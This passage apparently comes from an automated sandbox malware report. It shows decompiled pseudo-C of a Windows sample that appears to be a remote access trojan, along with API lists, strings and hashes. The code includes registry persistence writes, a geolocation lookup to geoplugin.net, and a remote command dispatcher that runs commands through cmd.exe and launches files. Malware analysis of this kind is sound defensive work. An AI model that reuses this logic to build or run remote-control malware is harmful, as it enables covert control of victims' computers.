                    								__ecx =  &_v652;
                    								__eax = E00401F13( &_v652, __edx, __esi, __eax);
                    								__ecx =  &_v632;
                    								__eax = E00401F09();
                    								__ecx =  &_v608;
                    								__eax = E00401F09();
                    								__ecx =  &_v584;
                    								L5:
                    								__eax = E00401F09();
                    								goto L17;
                    							}
                    							L18:
                    						case 5:
                    							L14:
                    							_push(L"ProgramFiles");
                    							goto L15;
                    						case 6:
                    							_push(L"AppData");
                    							goto L15;
                    						case 7:
                    							_push(L"UserProfile");
                    							L15:
                    							_t51 = E0043BA8F(_t54, _t57, _t86);
                    							goto L16;
                    						case 8:
                    							__eflags = E0043BA8F(__ebx, __ecx, __eflags, L"ProgramData");
                    							if(__eflags == 0) {
                    								goto L14;
                    							}
                    							L16:
                    							L00408F7E(_t54,  &_v644, _t73, _t51);
                    							goto L17;
                    					}
                    				}
                    				L17:
                    				__imp__GetLongPathNameW(E00401F04( &_v644),  &_v524, 0x208); // executed
                    				_t39 = E0040417E(_t54,  &_v560, _t73, _t82, _a4);
                    				_t40 = E0040417E(_t54,  &_v636, _t73, _t82, "\\");
                    				E00402FA5(_t77, E00402FA5( &_v600, E0040DBDA(_t54,  &_v616, _t73, _t82, _t86,  &_v544, _t38), _t40), _t39);
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				E00401F09();
                    				return _t77;
                    				goto L18;
                    			}





























                    0x0040d83d
                    0x0040d84c
                    0x0040d84e
                    0x0040d854
                    0x0040d85c
                    0x0040d85f
                    0x0040d862
                    0x0040d868
                    0x00000000
                    0x0040d86f
                    0x00000000
                    0x00000000
                    0x0040d879
                    0x0040d87d
                    0x0040d883
                    0x0040d887
                    0x00000000
                    0x00000000
                    0x0040d89a
                    0x00000000
                    0x00000000
                    0x0040d8a4
                    0x00000000
                    0x00000000
                    0x0040d8ae
                    0x0040d8b3
                    0x0040d8b5
                    0x0040d90e
                    0x0040d91d
                    0x0040d924
                    0x0040d92d
                    0x0040d92f
                    0x0040d933
                    0x0040d93a
                    0x0040d93e
                    0x0040d943
                    0x0040d947
                    0x0040d94c
                    0x0040d950
                    0x0040d88c
                    0x0040d88c
                    0x00000000
                    0x0040d8b7
                    0x0040d8bc
                    0x0040d8cb
                    0x0040d8d2
                    0x0040d8db
                    0x0040d8dd
                    0x0040d8e1
                    0x0040d8e8
                    0x0040d8ec
                    0x0040d8f1
                    0x0040d8f5
                    0x0040d8fa
                    0x0040d8fe
                    0x0040d903
                    0x0040d890
                    0x0040d890
                    0x00000000
                    0x0040d890
                    0x00000000
                    0x00000000
                    0x0040d977
                    0x0040d977
                    0x00000000
                    0x00000000
                    0x0040d95a
                    0x00000000
                    0x00000000
                    0x0040d961
                    0x0040d97c
                    0x0040d97c
                    0x00000000
                    0x00000000
                    0x0040d973
                    0x0040d975
                    0x00000000
                    0x00000000
                    0x0040d982
                    0x0040d987
                    0x00000000
                    0x00000000
                    0x0040d868
                    0x0040d98c
                    0x0040d9a3
                    0x0040d9b2
                    0x0040d9c1
                    0x0040d9e9
                    0x0040d9f3
                    0x0040d9fc
                    0x0040da05
                    0x0040da0e
                    0x0040da17
                    0x0040da24
                    0x00000000

                    APIs
                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040D9A3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: LongNamePath
                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                    • API String ID: 82841172-425784914
                    • Opcode ID: f06b9021694376bea77b366babdda57a71249a1cc1dc51e54e9e9b01ce031893
                    • Instruction ID: 22699afc1ea9fa938e68b3fac56991084b98d974cc68fdb01484cdac7e20b393
                    • Opcode Fuzzy Hash: f06b9021694376bea77b366babdda57a71249a1cc1dc51e54e9e9b01ce031893
                    • Instruction Fuzzy Hash: A6417D715082019AC305FB62D852DAFB7A8AF94719F50063FB586A20E2FF7C9D0DC65B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1231 41ad58-41adaf call 41ba4c call 413154 call 401fe2 call 401fd8 call 406a08 1242 41adb1-41adc0 call 413154 1231->1242 1243 41adf2-41adfb 1231->1243 1248 41adc5-41addc call 401fab StrToIntA 1242->1248 1244 41ae04 1243->1244 1245 41adfd-41ae02 1243->1245 1247 41ae09-41ae14 call 40537d 1244->1247 1245->1247 1253 41adea-41aded call 401fd8 1248->1253 1254 41adde-41ade7 call 41c987 1248->1254 1253->1243 1254->1253
                    C-Code - Quality: 74%
                    			E0041AD58(void* __ecx, void* __eflags) {
                    				char _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				char _t7;
                    				void* _t8;
                    				int _t15;
                    				void* _t25;
                    				void* _t31;
                    				void* _t32;
                    				void* _t33;
                    
                    				_t7 = E0041BA4C(__ecx);
                    				_push(__ecx);
                    				_t19 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
                    				 *0x473af4 = _t7;
                    				_t29 = 0x80000002;
                    				_t8 = E00413154( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                    				E00401FE2(0x4749e8, 0x80000002, _t31, _t8);
                    				E00401FD8();
                    				_t32 = E00406A08(0x4749e8, "10", 0);
                    				if(_t32 != 0xffffffff) {
                    					_push(0x4749e8);
                    					_t29 = 0x80000002;
                    					E00413154( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "CurrentBuildNumber"); // executed
                    					_t15 = StrToIntA(E00401FAB( &_v28));
                    					_t39 = _t15 - 0x55f0;
                    					if(_t15 >= 0x55f0) {
                    						_t5 = _t32 + 1; // 0x1
                    						 *((char*)(E0041C987(0x80000002, _t33, _t39, _t5))) = 0x31;
                    					}
                    					E00401FD8();
                    				}
                    				_t25 = 0x4749e8;
                    				if( *0x473af4 == 0) {
                    					_push(" (32 bit)");
                    				} else {
                    					_push(" (64 bit)");
                    				}
                    				return L0040537D(_t19, _t25, _t29, 0x4749e8, _t33);
                    			}















                    0x0041ad61
                    0x0041ad66
                    0x0041ad6c
                    0x0041ad71
                    0x0041ad77
                    0x0041ad7f
                    0x0041ad8f
                    0x0041ad97
                    0x0041adaa
                    0x0041adaf
                    0x0041adb1
                    0x0041adb8
                    0x0041adc0
                    0x0041add1
                    0x0041add7
                    0x0041addc
                    0x0041adde
                    0x0041ade7
                    0x0041ade7
                    0x0041aded
                    0x0041aded
                    0x0041adf9
                    0x0041adfb
                    0x0041ae04
                    0x0041adfd
                    0x0041adfd
                    0x0041adfd
                    0x0041ae14

                    APIs
                      • Part of subcall function 0041BA4C: GetCurrentProcess.KERNEL32(?,?,?,0040D8B3,WinDir,00000000,00000000), ref: 0041BA5D
                      • Part of subcall function 0041BA4C: IsWow64Process.KERNEL32(00000000,?,?,0040D8B3,WinDir,00000000,00000000), ref: 0041BA64
                      • Part of subcall function 00413154: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413178
                      • Part of subcall function 00413154: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413195
                      • Part of subcall function 00413154: RegCloseKey.KERNEL32(?), ref: 004131A0
                    • StrToIntA.SHLWAPI(00000000,0046B9E4,00000000,00000000,00000000,X2},00000003,Exe,00000000,0000000E,00000000,004650AC,00000003,00000000), ref: 0041ADD1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseCurrentOpenQueryValueWow64
                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$X2}$IG
                    • API String ID: 782494840-2712550919
                    • Opcode ID: 9abdff81a25cfd8a4d7c3be51d60f580f8dd4fbdeb330c5794ec049557aeff6f
                    • Instruction ID: dc9b4c847149f7ae4ecd71391141b78ef5e359cb4ffd727245afad7bedc3df07
                    • Opcode Fuzzy Hash: 9abdff81a25cfd8a4d7c3be51d60f580f8dd4fbdeb330c5794ec049557aeff6f
                    • Instruction Fuzzy Hash: 1A1101A0A4020626C704B6669C87EBFBA198B41305F50012BF505B22D2FB6C499683EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 90%
                    			E0041AE15(void* __ecx, void* __edx) {
                    				WCHAR* _v36;
                    				long _v80;
                    				char _v88;
                    				int _v92;
                    				intOrPtr _v96;
                    				void* _v100;
                    				int _v104;
                    				intOrPtr _v108;
                    				void* __ebx;
                    				void* __ebp;
                    				void* _t12;
                    				void* _t13;
                    				void* _t14;
                    				int _t16;
                    				void* _t24;
                    				intOrPtr _t27;
                    				void* _t32;
                    				void* _t33;
                    				void* _t35;
                    				void* _t37;
                    
                    				_t32 = __edx;
                    				_t25 = __ecx;
                    				_t24 = __ecx;
                    				E004020DF(__ecx, __ecx);
                    				_push(0xffff);
                    				_v36 = 0;
                    				_t12 = E0043B715(_t25); // executed
                    				_t33 = _t12; // executed
                    				_t13 = InternetOpenW(0, 1, 0, 0, 0); // executed
                    				_t37 = _t13;
                    				_t14 = InternetOpenUrlW(_t37, L"http://geoplugin.net/json.gp", 0, 0, 0x80000000, 0); // executed
                    				_t35 = _t14;
                    				do {
                    					_v80 = _v80 & 0x00000000;
                    					_t16 = InternetReadFile(_t35, _t33, 0xffff,  &_v80); // executed
                    					_t27 = _v96;
                    					_v92 = _t16;
                    					_t40 = _t27;
                    					if(_t27 != 0) {
                    						L00403376(E004020B7(_t24,  &_v88, _t32, _t37, _t40, _t33, _t27));
                    						E00401FD8();
                    						_t27 = _v108;
                    						_t16 = _v104;
                    					}
                    				} while (_t16 == 1 && _t27 != 0);
                    				InternetCloseHandle(_t35);
                    				InternetCloseHandle(_t37);
                    				L0043B710(_t33); // executed
                    				return _t24;
                    			}























                    0x0041ae15
                    0x0041ae15
                    0x0041ae1c
                    0x0041ae1e
                    0x0041ae25
                    0x0041ae2a
                    0x0041ae2e
                    0x0041ae3a
                    0x0041ae3c
                    0x0041ae4a
                    0x0041ae52
                    0x0041ae58
                    0x0041ae5a
                    0x0041ae5a
                    0x0041ae6b
                    0x0041ae71
                    0x0041ae75
                    0x0041ae79
                    0x0041ae7b
                    0x0041ae8b
                    0x0041ae94
                    0x0041ae99
                    0x0041ae9d
                    0x0041ae9d
                    0x0041aea1
                    0x0041aeb1
                    0x0041aeb4
                    0x0041aeb7
                    0x0041aec6

                    APIs
                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041AE3C
                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041AE52
                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041AE6B
                    • InternetCloseHandle.WININET(00000000), ref: 0041AEB1
                    • InternetCloseHandle.WININET(00000000), ref: 0041AEB4
                    Strings
                    • http://geoplugin.net/json.gp, xrefs: 0041AE4C
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileRead
                    • String ID: http://geoplugin.net/json.gp
                    • API String ID: 3121278467-91888290
                    • Opcode ID: 2de284e0f18a6d121873f057b10254d626e3783ca63435482fcb4e2a3b6b8edc
                    • Instruction ID: 23e29809358a8d67015ea55eed5a307591c61350c75ee4705be9d740d7d7fe9e
                    • Opcode Fuzzy Hash: 2de284e0f18a6d121873f057b10254d626e3783ca63435482fcb4e2a3b6b8edc
                    • Instruction Fuzzy Hash: E51186311053126BD224AB169C49EAF7BDCEF86765F00043EF906A2281DF68D844C6BA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1340 41331d-413334 RegCreateKeyA 1341 413336-41336b call 40247c call 401fab RegSetValueExA RegCloseKey 1340->1341 1342 41336d 1340->1342 1343 41336f-41337d call 401fd8 1341->1343 1342->1343
                    C-Code - Quality: 77%
                    			E0041331D(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
                    				void* _v8;
                    				long _t12;
                    				int _t15;
                    				long _t17;
                    				signed int _t19;
                    				signed int _t20;
                    
                    				_push(__ecx);
                    				_push(_t19);
                    				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
                    				if(_t12 != 0) {
                    					_t20 = 0;
                    				} else {
                    					_t15 = E0040247C();
                    					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, E00401FAB( &_a8), _t15); // executed
                    					RegCloseKey(_v8);
                    					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
                    				}
                    				E00401FD8();
                    				return _t20;
                    			}









                    0x00413320
                    0x00413321
                    0x0041332c
                    0x00413334
                    0x0041336d
                    0x00413336
                    0x0041333a
                    0x00413354
                    0x0041335f
                    0x00413368
                    0x00413368
                    0x00413372
                    0x0041337d

                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041332C
                    • RegSetValueExA.KERNEL32(?,004664A0,00000000,?,00000000,00000000,004742D8,?,?,0040F65C,004664A0,4.8.0 Pro), ref: 00413354
                    • RegCloseKey.ADVAPI32(?,?,?,0040F65C,004664A0,4.8.0 Pro), ref: 0041335F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: pth_unenc
                    • API String ID: 1818849710-4028850238
                    • Opcode ID: 28f4f543f4f07d4d00ab62f8da5d5f2ae06772f9cedc579e7fb7a618be483beb
                    • Instruction ID: 3d4143bf561cc511a86b0d68ab544afdf7eb00213e490ad3d2ea4dca6eab4358
                    • Opcode Fuzzy Hash: 28f4f543f4f07d4d00ab62f8da5d5f2ae06772f9cedc579e7fb7a618be483beb
                    • Instruction Fuzzy Hash: C9F06D72440218BFCB00AFA1DD45EEA376CEF04B51F10416AFD05B61A2EF359F18DA98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 94%
                    			E00404CC3(void* __ecx, void* __edx, _Unknown_base(*)()* _a4, signed int _a12) {
                    				char _v24;
                    				char _v28;
                    				char _v40;
                    				void* _v44;
                    				char _v48;
                    				signed int _v52;
                    				void* _v56;
                    				char _v60;
                    				char _v64;
                    				intOrPtr _v68;
                    				char _v76;
                    				char _v80;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t35;
                    				void* _t61;
                    				void* _t65;
                    				struct _SECURITY_ATTRIBUTES* _t67;
                    				signed int _t73;
                    				void* _t90;
                    				_Unknown_base(*)()* _t92;
                    				void* _t94;
                    				void* _t96;
                    				void* _t97;
                    				void* _t98;
                    
                    				_t90 = __edx;
                    				_t97 =  &_v56;
                    				_v52 = _v52 & 0x00000000;
                    				_t94 = __ecx;
                    				 *(__ecx + 0x54) =  *(__ecx + 0x54) & 0x00000000;
                    				E004020DF(_t65,  &_v48);
                    				_t7 = _t94 + 0x58; // 0x473f38
                    				_t35 = _t7;
                    				_t92 = _a4;
                    				while(E00404EFB(_t94, E00401FAB(_t92),  &_v52, _t35) != 0) {
                    					_t10 = _t94 + 0x30; // 0x8
                    					_t73 =  *_t10 & 0x000000ff;
                    					_a12 = _t73;
                    					_t96 = _v52 + _t73;
                    					if(_t96 <= E0040247C()) {
                    						_t67 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t67 = 1;
                    						 *((intOrPtr*)(_t94 + 0x54)) = _t96 - E0040247C();
                    					}
                    					if(_t67 == 0) {
                    						E00401FE2( &_v60, _t90, _t94, E004041A2(_t92,  &_v24, _a12, 0xffffffff));
                    						E00401FD8();
                    						E00401FE2( &_v76, _t90, _t94, E004041A2( &_v64,  &_v40, 0, _v68));
                    						E00401FD8();
                    						_t103 = _t67;
                    						if(_t67 != 0) {
                    							_t25 = _t94 + 0xc; // 0x473eec
                    							E00401FC0(_t25,  &_v80);
                    							 *(_t94 + 0x24) = CreateEventA(0, 0, 0, 0);
                    							__eflags = 0;
                    							CreateThread(0, 0, _a4, _t94, 0, 0); // executed
                    							_t28 = _t94 + 0x24; // 0x0
                    							WaitForSingleObject( *_t28, 0xffffffff);
                    							_t29 = _t94 + 0x24; // 0x0
                    							CloseHandle( *_t29);
                    						} else {
                    							_t98 = _t97 - 0x18;
                    							E004020F6(_t67, _t98, _t90, _t103,  &_v80);
                    							_a4(_t94);
                    							_t97 = _t98 + 0x1c;
                    						}
                    						E00401FE2(_t92, _t90, _t94, E004041A2(_t92,  &_v28, _t96, 0xffffffff));
                    						E00401FD8();
                    						_t61 = E0040247C();
                    						_t32 = _t94 + 0x58; // 0x473f38
                    						_t35 = _t32;
                    						if(_t61 != 0) {
                    							continue;
                    						}
                    					}
                    					break;
                    				}
                    				return E00401FD8();
                    			}





























                    0x00404cc3
                    0x00404cc3
                    0x00404cc6
                    0x00404cce
                    0x00404cd5
                    0x00404cd9
                    0x00404ce2
                    0x00404ce2
                    0x00404ce5
                    0x00404ce9
                    0x00404d06
                    0x00404d06
                    0x00404d0e
                    0x00404d12
                    0x00404d1d
                    0x00404d31
                    0x00404d31
                    0x00404d1f
                    0x00404d21
                    0x00404d2c
                    0x00404d2c
                    0x00404d35
                    0x00404d52
                    0x00404d5b
                    0x00404d79
                    0x00404d82
                    0x00404d8b
                    0x00404d8d
                    0x00404da5
                    0x00404da8
                    0x00404db9
                    0x00404dbc
                    0x00404dc7
                    0x00404dcf
                    0x00404dd2
                    0x00404dd8
                    0x00404ddb
                    0x00404d8f
                    0x00404d8f
                    0x00404d95
                    0x00404d9b
                    0x00404d9f
                    0x00404d9f
                    0x00404df3
                    0x00404dfc
                    0x00404e03
                    0x00404e0a
                    0x00404e0a
                    0x00404e0d
                    0x00000000
                    0x00000000
                    0x00404e0d
                    0x00000000
                    0x00404d35
                    0x00404e23

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00473F38), ref: 00404DB3
                    • CreateThread.KERNEL32 ref: 00404DC7
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3360349984-0
                    • Opcode ID: 8dfaaab00813f30e740c8ff73746e223d223490fab679f80b30a73d01196457f
                    • Instruction ID: c7ef7a299e46a2f8c5f6678ff857e65c0560a006e7720ce8127b4b04a03e70c6
                    • Opcode Fuzzy Hash: 8dfaaab00813f30e740c8ff73746e223d223490fab679f80b30a73d01196457f
                    • Instruction Fuzzy Hash: A14162B11083016BC714AB62CD55D7FBBEDAFD4314F40092EF592A22E1DF3899098666
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 84%
                    			E004156F7(CHAR* __edx, void* __eflags, intOrPtr _a4, char _a61) {
                    				char _v28;
                    				char _v56;
                    				void* _v60;
                    				char _v80;
                    				void* _v84;
                    				char _v104;
                    				void* _v108;
                    				char _v128;
                    				void* _v132;
                    				void* _v156;
                    				char _v260;
                    				char _v264;
                    				char _v272;
                    				char _v284;
                    				char _v288;
                    				char _v300;
                    				char _v304;
                    				char _v308;
                    				char _v312;
                    				char _v332;
                    				char _v344;
                    				long _v348;
                    				void* _v352;
                    				char _v356;
                    				char _v360;
                    				void* _v364;
                    				char _v376;
                    				char _v380;
                    				char _v384;
                    				char _v392;
                    				intOrPtr _v396;
                    				char _v400;
                    				struct HWND__* _v404;
                    				void* _v408;
                    				char _v412;
                    				char _v416;
                    				char _v428;
                    				char _v432;
                    				char _v436;
                    				char _v440;
                    				char _v444;
                    				char _v448;
                    				char _v452;
                    				char _v456;
                    				char _v460;
                    				char _v464;
                    				char _v468;
                    				char _v476;
                    				char _v480;
                    				char _v484;
                    				void* _v500;
                    				void* _v504;
                    				struct HWND__* __ebx;
                    				intOrPtr* _t221;
                    				void* _t265;
                    				intOrPtr _t326;
                    				void* _t328;
                    				signed int _t333;
                    				void* _t336;
                    				void* _t337;
                    				void* _t338;
                    
                    				_t340 = __eflags;
                    				_t312 = __edx;
                    				_push(_t265);
                    				_t326 = _a4;
                    				E004020F6(_t265,  &_v308, __edx, __eflags, _t326 + 0xc);
                    				SetEvent( *(_t326 + 0x24));
                    				_t221 = E00401FAB( &_v312);
                    				E004041A2( &_v312,  &_v288, 4, 0xffffffff);
                    				_t336 = (_t333 & 0xfffffff8) - 0x1a4;
                    				E004020F6(_t265, _t336, _t312, _t340, 0x473ec8);
                    				_t337 = _t336 - 0x18;
                    				E004020F6(_t265, _t337, _t312, _t340,  &_v304);
                    				E0041B8B0( &_v468, _t312);
                    				_t338 = _t337 + 0x30;
                    				_t328 =  *_t221 - 1;
                    				if(_t328 <= 0xcd) {
                    					switch( *((intOrPtr*)(( *(_t328 + 0x416c83) & 0x000000ff) * 4 +  &M00416B53))) {
                    						case 0:
                    							_t234 = E0041B623(0,  &_v400, GetTickCount());
                    							_t236 = E0041B623(0,  &_v376, E0041B57B( &_v400));
                    							_t237 = E0041B52B(0,  &_v332, 0x473ec8); // executed
                    							_t238 = E0041B7B3(0,  &_v28, _t237);
                    							_t321 = E00402F10(0,  &_v436, E00402EA1( &_v128, E00402F10(0,  &_v104, E00402EA1( &_v80, E00402F31( &_v56, E00401E65( &_v444, _t237, _t332, _t341, 0), _t332, 0x473ec8), _t238), _t332, _t341, 0x473ec8), _t236), _t332, _t341, 0x473ec8);
                    							E00402EA1(_t338 - 0x18, _t244, _t234);
                    							_push(0x4c);
                    							E00404AA1(0x474580, _t244, _t341); // executed
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401F09();
                    							E00401FD8();
                    							E00401FD8();
                    							_t258 = E0043B4A1(_t256, E00401FAB(E00401E65( &_v476, _t244, _t332, _t341, 1)));
                    							if(_t258 == 0) {
                    								E00401E65( &_v464, _t321, _t332, __eflags, 0);
                    								_t312 = "0";
                    								_t260 = E00405B05("0");
                    								__eflags = _t260;
                    								if(_t260 != 0) {
                    									_push(0);
                    									_t310 = 0x474580;
                    									goto L8;
                    								}
                    							} else {
                    								_t312 = _t258 + _t258;
                    								if(E004046F3(0x474580) == 0) {
                    									E00404F51(0x474580, _t312, 1);
                    								} else {
                    									E00404FF4(_t312);
                    								}
                    							}
                    							goto L143;
                    						case 1:
                    							_push(0);
                    							__ecx = 0x474580;
                    							L8:
                    							E004050E4(_t310, _t332);
                    							goto L143;
                    						case 2:
                    							__ecx =  &_v400;
                    							__eax = E0041C124(__ebx,  &_v400, __edx);
                    							__esp = __esp - 0x18;
                    							__edx = __eax;
                    							__ecx = __esp;
                    							__eax = E0041B7B3(__ebx, __esp, __edx);
                    							_push(0x33);
                    							__ecx = 0x474580;
                    							__eax = E00404AA1(0x474580, __edx, __eflags);
                    							__ecx =  &_v428;
                    							goto L21;
                    						case 3:
                    							 &_v352 = GetCurrentProcessId();
                    							__eax = E00441861(__ecx, __eax,  &_v352, 0xa);
                    							__esp = __esp - 0xc;
                    							__eax =  &_v352;
                    							__esi = __esp;
                    							__ecx =  &_v376;
                    							__edx = E0040F706(__ebx,  &_v376, __edx, __eflags);
                    							__ecx =  &_v400;
                    							__edx = __eax;
                    							__ecx = __esp;
                    							__eax = E00406383(__ebx, __esp, __edx, __edi, __ebp, __eflags,  &_v352);
                    							_push(0x4f);
                    							goto L24;
                    						case 4:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__ecx);
                    							__ecx = __eax;
                    							__eax = E0041B5F6(__ecx);
                    							goto L143;
                    						case 5:
                    							L36:
                    							__eax = E00417398(__ebx);
                    							goto L143;
                    						case 6:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__ecx);
                    							__eax = CloseWindow(__eax);
                    							goto L143;
                    						case 7:
                    							_push(3);
                    							goto L30;
                    						case 8:
                    							_push(9);
                    							goto L30;
                    						case 9:
                    							__eax =  &_v348;
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__ecx);
                    							__eax = GetWindowThreadProcessId(__eax,  &_v348);
                    							__ecx = _v352;
                    							__eax = E0041B5F6(_v352);
                    							goto L36;
                    						case 0xa:
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							__eax = E00401FAB(__eax);
                    							__ecx =  &_v380;
                    							__eax = E0040417E(0,  &_v380, __edx, __ebp, __eax);
                    							__edx = L"/C ";
                    							__ecx =  &_v408;
                    							__ecx = __eax;
                    							__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
                    							__ecx =  &_v408;
                    							__eax = E00401F09();
                    							__ecx =  &_v384;
                    							goto L21;
                    						case 0xb:
                    							__ecx =  &_v444;
                    							__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 1);
                    							__ecx = 0x473f78;
                    							__eax = E00401FC0(0x473f78, __eax);
                    							__eflags =  *0x471ae7 - __bl; // 0x0
                    							if(__eflags == 0) {
                    								__ecx =  &_v444;
                    								__eax = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E0040569A();
                    								goto L14;
                    							}
                    							goto L143;
                    						case 0xc:
                    							__ebx = 0;
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 0);
                    							E00401FAB(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
                    							goto L143;
                    						case 0xd:
                    							__ecx =  &_v444;
                    							__ecx = E00401E65( &_v444, __edx, __ebp, __eflags, 2);
                    							__eax = E00401FAB(__ecx);
                    							__eax = E0043B4A1(__ecx, __eax);
                    							__ebx = 0;
                    							__ecx =  &_v448;
                    							__esi = __eax;
                    							__eax = E00401E65( &_v448, __edx, __ebp, __eflags, 0);
                    							__ecx =  &_v440;
                    							__eax = E004020F6(0,  &_v440, __edx, __eflags, __eax);
                    							__edx = "0";
                    							__ecx =  &_v444;
                    							__eax = E0040B832(__eflags);
                    							__ecx =  &_v456;
                    							_push(4);
                    							__eflags = __al;
                    							if(__eflags == 0) {
                    								__eax = E00401E65( &_v456, __edx, __ebp, __eflags);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020F6(0, __esp, __edx, __eflags, __eax);
                    								__esp = __esp - 0x18;
                    								__eax =  &_v440;
                    								__ecx = __esp;
                    								__eax = E004020F6(0, __esp, __edx, __eflags,  &_v440);
                    								__edi = 0x474780;
                    								__ecx = 0x474780;
                    								__eax = E00418204(0x474780, __edx);
                    								_push(0);
                    							} else {
                    								__eax = E00401E65( &_v456, __edx, __ebp, __eflags);
                    								__esp = __esp - 0x18;
                    								__ecx = __esp;
                    								__eax = E004020F6(0, __esp, __edx, __eflags, __eax);
                    								__esp = __esp - 0x18;
                    								__eax =  &_v440;
                    								__ecx = __esp;
                    								__eax = E004020F6(0, __esp, __edx, __eflags,  &_v440);
                    								__edi = 0x4746c8;
                    								__ecx = 0x4746c8;
                    								__eax = E00418204(0x4746c8, __edx);
                    								_push(1);
                    							}
                    							_push(__esi);
